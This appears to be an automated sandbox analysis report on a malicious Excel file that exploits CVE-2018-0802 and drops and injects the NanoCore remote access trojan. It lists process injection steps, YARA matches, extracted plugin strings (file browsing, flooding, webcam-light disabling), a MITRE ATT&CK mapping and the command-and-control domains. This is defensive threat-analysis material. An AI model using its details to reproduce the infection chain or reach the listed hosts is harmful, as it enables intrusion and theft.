Allocates memory in foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\vbc.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe			Jump to behavior

Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm4
Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm
Source: RegAsm.exe, 00000005.00000002.2364980071.0000000002D0A000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cmp
Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm0
Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm`/
Source: RegAsm.exe, 00000005.00000002.2364029644.0000000001060000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm\
Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmp	Binary or memory string: Program ManagerL
Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cmx
Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cmtz
Source: RegAsm.exe, 00000005.00000002.2365016404.0000000002D0E000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm8
Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmp	Binary or memory string: Program Manager48CmD
Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmp	Binary or memory string: Program Manager8
Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm$
Source: RegAsm.exe, 00000005.00000002.2364029644.0000000001060000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm
Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmp	Binary or memory string: Program Manager48CmH9
Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cml>
Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmp	Binary or memory string: Program Manager48CmX,
Source: RegAsm.exe, 00000005.00000002.2365541141.0000000002FE9000.00000004.00000001.sdmp	Binary or memory string: Program Manager\
Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm<4
Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmp	Binary or memory string: Program Manager48Cm80

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation			Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: vbc.exe, 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegAsm.exe, 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Registry Run Keys / Startup Folder1	Extra Window Memory Injection1	Disable or Modify Tools1	Input Capture11	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection312	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery13	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Obfuscated Files or Information31	Security Account Manager	Security Software Discovery21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing13	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	Virtualization/Sandbox Evasion21	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading111	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol122	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion21	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection312	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Ref 0180066743.xlsx	22%	ReversingLabs	Document-OLE.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\win33.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	39%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.Bulz
C:\Users\user\AppData\Local\Temp\RegAsm.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\RegAsm.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\win33.exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.Bulz
C:\Users\Public\vbc.exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.Bulz

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.RegAsm.exe.400000.2.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.0.RegAsm.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
5.0.RegAsm.exe.400000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
5.2.RegAsm.exe.de0000.14.unpack	100%	Avira	TR/NanoCore.fadte	Download File

Domains

Source	Detection	Scanner	Label	Link
wekeepworking.sytes.net	8%	Virustotal		Browse
wekeepworking12.sytes.net	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
